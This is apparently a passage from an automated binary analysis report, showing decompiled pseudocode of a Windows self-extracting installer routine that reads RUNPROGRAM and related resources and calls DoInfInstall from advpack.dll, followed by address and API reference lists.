                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                      				_t69 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                      				 *0x3e9124 =  *0x3e9124 & 0;
                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                      				_t165 =  *0x3e8a28 - _t153; // 0x0
                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                      						if( *0x3e8c42 != 0) {
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                      						_t115 = E003E468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                      							E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      							 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                      									if(_v396 == _t137) {
                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                      								if(_t127 != 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_t155 = 1;
                                                                                                                                                                                                      									__eflags = _t127 - 1;
                                                                                                                                                                                                      									if(_t127 != 1) {
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t132 =  &_v280;
                                                                                                                                                                                                      										_t76 = E003E1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                      										__eflags = _t76;
                                                                                                                                                                                                      										if(_t76 == 0) {
                                                                                                                                                                                                      											L62:
                                                                                                                                                                                                      											_t77 = 0;
                                                                                                                                                                                                      											L63:
                                                                                                                                                                                                      											_pop(_t150);
                                                                                                                                                                                                      											_pop(_t156);
                                                                                                                                                                                                      											_pop(_t128);
                                                                                                                                                                                                      											return E003E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t157 = _v404;
                                                                                                                                                                                                      										__eflags = _t149;
                                                                                                                                                                                                      										if(_t149 != 0) {
                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												L57:
                                                                                                                                                                                                      												_t151 = _v408;
                                                                                                                                                                                                      												_t146 =  &_v352;
                                                                                                                                                                                                      												_t130 = _t151; // executed
                                                                                                                                                                                                      												_t79 = E003E3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                      												__eflags = _t79;
                                                                                                                                                                                                      												if(_t79 == 0) {
                                                                                                                                                                                                      													L61:
                                                                                                                                                                                                      													LocalFree(_t151);
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												L58:
                                                                                                                                                                                                      												LocalFree(_t151);
                                                                                                                                                                                                      												_t127 = _t127 + 1;
                                                                                                                                                                                                      												_v396 = _t127;
                                                                                                                                                                                                      												__eflags = _t127 - 2;
                                                                                                                                                                                                      												if(_t127 >= 2) {
                                                                                                                                                                                                      													_t155 = 1;
                                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                                      													L69:
                                                                                                                                                                                                      													__eflags =  *0x3e8580;
                                                                                                                                                                                                      													if( *0x3e8580 != 0) {
                                                                                                                                                                                                      														E003E2267();
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													_t77 = _t155;
                                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t153 = _v392;
                                                                                                                                                                                                      												_t149 = _v388;
                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											L38:
                                                                                                                                                                                                      											__eflags =  *0x3e8180;
                                                                                                                                                                                                      											if( *0x3e8180 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c7;
                                                                                                                                                                                                      												E003E44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                      												LocalFree(_v424);
                                                                                                                                                                                                      												 *0x3e9124 = 0x8007042b;
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0x3e9a34 & 0x00000004;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t129 = E003E6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                      											__eflags = _t129;
                                                                                                                                                                                                      											if(_t129 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c8;
                                                                                                                                                                                                      												E003E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                      												L65:
                                                                                                                                                                                                      												LocalFree(_v408);
                                                                                                                                                                                                      												 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                      											_v404 = _t146;
                                                                                                                                                                                                      											__eflags = _t146;
                                                                                                                                                                                                      											if(_t146 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c9;
                                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                                      												E003E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                      												FreeLibrary(_t129);
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0x3e8a30;
                                                                                                                                                                                                      											_t151 = _v408;
                                                                                                                                                                                                      											_v384 = 0;
                                                                                                                                                                                                      											_v368 =  &_v280;
                                                                                                                                                                                                      											_t96 =  *0x3e9a40; // 0x3
                                                                                                                                                                                                      											_v364 = _t96;
                                                                                                                                                                                                      											_t97 =  *0x3e8a38 & 0x0000ffff;
                                                                                                                                                                                                      											_v380 = 0x3e9154;
                                                                                                                                                                                                      											_v376 = _t151;
                                                                                                                                                                                                      											_v372 = 0x3e91e4;
                                                                                                                                                                                                      											_v360 = _t97;
                                                                                                                                                                                                      											if( *0x3e8a30 != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t144 =  *0x3e9a34; // 0x1
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t145 =  *0x3e8d48; // 0x0
                                                                                                                                                                                                      											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t145;
                                                                                                                                                                                                      											if(_t145 < 0) {
                                                                                                                                                                                                      												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                      												__eflags = _t104;
                                                                                                                                                                                                      												_v360 = _t104;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t98 =  *0x3e9a38; // 0x0
                                                                                                                                                                                                      											_v356 = _t98;
                                                                                                                                                                                                      											_t130 = _t146;
                                                                                                                                                                                                      											 *0x3ea288( &_v384);
                                                                                                                                                                                                      											_t101 = _v404();
                                                                                                                                                                                                      											__eflags = _t164 - _t164;
                                                                                                                                                                                                      											if(_t164 != _t164) {
                                                                                                                                                                                                      												_t130 = 4;
                                                                                                                                                                                                      												asm("int 0x29");
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											 *0x3e9124 = _t101;
                                                                                                                                                                                                      											_push(_t129);
                                                                                                                                                                                                      											__eflags = _t101;
                                                                                                                                                                                                      											if(_t101 < 0) {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												_t127 = _v400;
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0x3e9a40 - 1; // 0x3
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0x3e8a20;
                                                                                                                                                                                                      										if( *0x3e8a20 == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      										E003E202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E003E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0x3e8c42;
                                                                                                                                                                                                      									if( *0x3e8c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0x3e8a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E003E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E003E468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                      						E003E1781( &_v276, 0x104, _t130, 0x3e8c42);
                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                      				_t125 = E003E468F(_t130, 0x3e9a2c, 4);
                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























































                                                                                                                                                                                                      0x003e3baa
                                                                                                                                                                                                      0x003e3bb0
                                                                                                                                                                                                      0x003e3bb7
                                                                                                                                                                                                      0x003e3bc0
                                                                                                                                                                                                      0x003e3bc2
                                                                                                                                                                                                      0x003e3bc9
                                                                                                                                                                                                      0x003e3bcb
                                                                                                                                                                                                      0x003e3bcf
                                                                                                                                                                                                      0x003e3bd3
                                                                                                                                                                                                      0x003e3bd9
                                                                                                                                                                                                      0x003e3bfd
                                                                                                                                                                                                      0x003e3bfd
                                                                                                                                                                                                      0x003e3bff
                                                                                                                                                                                                      0x003e3c03
                                                                                                                                                                                                      0x003e3c03
                                                                                                                                                                                                      0x003e3c11
                                                                                                                                                                                                      0x003e3c16
                                                                                                                                                                                                      0x003e3c19
                                                                                                                                                                                                      0x003e3c28
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3c30
                                                                                                                                                                                                      0x003e3c39
                                                                                                                                                                                                      0x003e3c40
                                                                                                                                                                                                      0x003e3d13
                                                                                                                                                                                                      0x003e3d15
                                                                                                                                                                                                      0x003e3d21
                                                                                                                                                                                                      0x003e3d26
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3c4f
                                                                                                                                                                                                      0x003e3c56
                                                                                                                                                                                                      0x003e3c60
                                                                                                                                                                                                      0x003e3c65
                                                                                                                                                                                                      0x003e3c77
                                                                                                                                                                                                      0x003e3c78
                                                                                                                                                                                                      0x003e3c7c
                                                                                                                                                                                                      0x003e3c7e
                                                                                                                                                                                                      0x003e3c82
                                                                                                                                                                                                      0x003e3c82
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3c7c
                                                                                                                                                                                                      0x003e3c67
                                                                                                                                                                                                      0x003e3c69
                                                                                                                                                                                                      0x003e3c6d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3c58
                                                                                                                                                                                                      0x003e3c58
                                                                                                                                                                                                      0x003e3c6e
                                                                                                                                                                                                      0x003e3c6e
                                                                                                                                                                                                      0x003e3c87
                                                                                                                                                                                                      0x003e3c89
                                                                                                                                                                                                      0x003e3d4d
                                                                                                                                                                                                      0x003e3d4f
                                                                                                                                                                                                      0x003e3d50
                                                                                                                                                                                                      0x003e3d52
                                                                                                                                                                                                      0x003e3d9e
                                                                                                                                                                                                      0x003e3da8
                                                                                                                                                                                                      0x003e3daf
                                                                                                                                                                                                      0x003e3db4
                                                                                                                                                                                                      0x003e3db6
                                                                                                                                                                                                      0x003e3f4d
                                                                                                                                                                                                      0x003e3f4d
                                                                                                                                                                                                      0x003e3f4f
                                                                                                                                                                                                      0x003e3f56
                                                                                                                                                                                                      0x003e3f57
                                                                                                                                                                                                      0x003e3f58
                                                                                                                                                                                                      0x003e3f63
                                                                                                                                                                                                      0x003e3f63
                                                                                                                                                                                                      0x003e3dbc
                                                                                                                                                                                                      0x003e3dc0
                                                                                                                                                                                                      0x003e3dc2
                                                                                                                                                                                                      0x003e3de6
                                                                                                                                                                                                      0x003e3de6
                                                                                                                                                                                                      0x003e3de8
                                                                                                                                                                                                      0x003e3f0b
                                                                                                                                                                                                      0x003e3f0b
                                                                                                                                                                                                      0x003e3f0f
                                                                                                                                                                                                      0x003e3f13
                                                                                                                                                                                                      0x003e3f15
                                                                                                                                                                                                      0x003e3f1a
                                                                                                                                                                                                      0x003e3f1c
                                                                                                                                                                                                      0x003e3f46
                                                                                                                                                                                                      0x003e3f47
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f47
                                                                                                                                                                                                      0x003e3f1e
                                                                                                                                                                                                      0x003e3f1f
                                                                                                                                                                                                      0x003e3f25
                                                                                                                                                                                                      0x003e3f26
                                                                                                                                                                                                      0x003e3f2a
                                                                                                                                                                                                      0x003e3f2d
                                                                                                                                                                                                      0x003e3fd9
                                                                                                                                                                                                      0x003e3fd9
                                                                                                                                                                                                      0x003e3fda
                                                                                                                                                                                                      0x003e3fda
                                                                                                                                                                                                      0x003e3fe1
                                                                                                                                                                                                      0x003e3fe3
                                                                                                                                                                                                      0x003e3fe3
                                                                                                                                                                                                      0x003e3fe8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3fe8
                                                                                                                                                                                                      0x003e3f33
                                                                                                                                                                                                      0x003e3f37
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f37
                                                                                                                                                                                                      0x003e3dee
                                                                                                                                                                                                      0x003e3dee
                                                                                                                                                                                                      0x003e3df5
                                                                                                                                                                                                      0x003e3fad
                                                                                                                                                                                                      0x003e3fb9
                                                                                                                                                                                                      0x003e3fc2
                                                                                                                                                                                                      0x003e3fc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3fc8
                                                                                                                                                                                                      0x003e3dfb
                                                                                                                                                                                                      0x003e3dfd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3e03
                                                                                                                                                                                                      0x003e3e0a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3e15
                                                                                                                                                                                                      0x003e3e17
                                                                                                                                                                                                      0x003e3e19
                                                                                                                                                                                                      0x003e3f94
                                                                                                                                                                                                      0x003e3fa4
                                                                                                                                                                                                      0x003e3f7c
                                                                                                                                                                                                      0x003e3f80
                                                                                                                                                                                                      0x003e3f8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f8b
                                                                                                                                                                                                      0x003e3e2c
                                                                                                                                                                                                      0x003e3e30
                                                                                                                                                                                                      0x003e3e34
                                                                                                                                                                                                      0x003e3e36
                                                                                                                                                                                                      0x003e3f69
                                                                                                                                                                                                      0x003e3f6e
                                                                                                                                                                                                      0x003e3f70
                                                                                                                                                                                                      0x003e3f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f76
                                                                                                                                                                                                      0x003e3e3c
                                                                                                                                                                                                      0x003e3e43
                                                                                                                                                                                                      0x003e3e47
                                                                                                                                                                                                      0x003e3e52
                                                                                                                                                                                                      0x003e3e56
                                                                                                                                                                                                      0x003e3e5c
                                                                                                                                                                                                      0x003e3e61
                                                                                                                                                                                                      0x003e3e68
                                                                                                                                                                                                      0x003e3e70
                                                                                                                                                                                                      0x003e3e74
                                                                                                                                                                                                      0x003e3e7c
                                                                                                                                                                                                      0x003e3e80
                                                                                                                                                                                                      0x003e3e82
                                                                                                                                                                                                      0x003e3e82
                                                                                                                                                                                                      0x003e3e87
                                                                                                                                                                                                      0x003e3e87
                                                                                                                                                                                                      0x003e3e8b
                                                                                                                                                                                                      0x003e3e91
                                                                                                                                                                                                      0x003e3e94
                                                                                                                                                                                                      0x003e3e96
                                                                                                                                                                                                      0x003e3e96
                                                                                                                                                                                                      0x003e3e9b
                                                                                                                                                                                                      0x003e3e9b
                                                                                                                                                                                                      0x003e3e9f
                                                                                                                                                                                                      0x003e3ea2
                                                                                                                                                                                                      0x003e3ea4
                                                                                                                                                                                                      0x003e3ea4
                                                                                                                                                                                                      0x003e3ea9
                                                                                                                                                                                                      0x003e3ea9
                                                                                                                                                                                                      0x003e3ead
                                                                                                                                                                                                      0x003e3eb3
                                                                                                                                                                                                      0x003e3eb6
                                                                                                                                                                                                      0x003e3eb8
                                                                                                                                                                                                      0x003e3eb8
                                                                                                                                                                                                      0x003e3ebd
                                                                                                                                                                                                      0x003e3ebd
                                                                                                                                                                                                      0x003e3ec1
                                                                                                                                                                                                      0x003e3ec3
                                                                                                                                                                                                      0x003e3ec5
                                                                                                                                                                                                      0x003e3ec5
                                                                                                                                                                                                      0x003e3eca
                                                                                                                                                                                                      0x003e3eca
                                                                                                                                                                                                      0x003e3ece
                                                                                                                                                                                                      0x003e3ed5
                                                                                                                                                                                                      0x003e3ed9
                                                                                                                                                                                                      0x003e3ee0
                                                                                                                                                                                                      0x003e3ee6
                                                                                                                                                                                                      0x003e3eea
                                                                                                                                                                                                      0x003e3eec
                                                                                                                                                                                                      0x003e3eee
                                                                                                                                                                                                      0x003e3ef3
                                                                                                                                                                                                      0x003e3ef3
                                                                                                                                                                                                      0x003e3ef5
                                                                                                                                                                                                      0x003e3efa
                                                                                                                                                                                                      0x003e3efb
                                                                                                                                                                                                      0x003e3efd
                                                                                                                                                                                                      0x003e3f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3eff
                                                                                                                                                                                                      0x003e3eff
                                                                                                                                                                                                      0x003e3f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3f05
                                                                                                                                                                                                      0x003e3efd
                                                                                                                                                                                                      0x003e3dc7
                                                                                                                                                                                                      0x003e3dce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3dd0
                                                                                                                                                                                                      0x003e3dd7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3dd9
                                                                                                                                                                                                      0x003e3ddb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3ddd
                                                                                                                                                                                                      0x003e3de1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3de1
                                                                                                                                                                                                      0x003e3d59
                                                                                                                                                                                                      0x003e3d65
                                                                                                                                                                                                      0x003e3d6a
                                                                                                                                                                                                      0x003e3d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3d6e
                                                                                                                                                                                                      0x003e3d75
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3d8f
                                                                                                                                                                                                      0x003e3d96
                                                                                                                                                                                                      0x003e3d98
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3d98
                                                                                                                                                                                                      0x003e3c8f
                                                                                                                                                                                                      0x003e3c98
                                                                                                                                                                                                      0x003e3cf1
                                                                                                                                                                                                      0x003e3cf3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3cfe
                                                                                                                                                                                                      0x003e3d11
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3d11
                                                                                                                                                                                                      0x003e3c9c
                                                                                                                                                                                                      0x003e3ca5
                                                                                                                                                                                                      0x003e3ca7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3cad
                                                                                                                                                                                                      0x003e3cb2
                                                                                                                                                                                                      0x003e3cb7
                                                                                                                                                                                                      0x003e3cc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3ce8
                                                                                                                                                                                                      0x003e3cec
                                                                                                                                                                                                      0x003e3ced
                                                                                                                                                                                                      0x003e3ced
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3ce8
                                                                                                                                                                                                      0x003e3c9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3c9e
                                                                                                                                                                                                      0x003e3c56
                                                                                                                                                                                                      0x003e3d35
                                                                                                                                                                                                      0x003e3d35
                                                                                                                                                                                                      0x003e3d3c
                                                                                                                                                                                                      0x003e3d48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3d48
                                                                                                                                                                                                      0x003e3c03
                                                                                                                                                                                                      0x003e3be2
                                                                                                                                                                                                      0x003e3be7
                                                                                                                                                                                                      0x003e3bee
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E3C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 003E3CDC
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,003E8C42), ref: 003E3D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 003E3E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,003E8C42), ref: 003E3F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3FC2
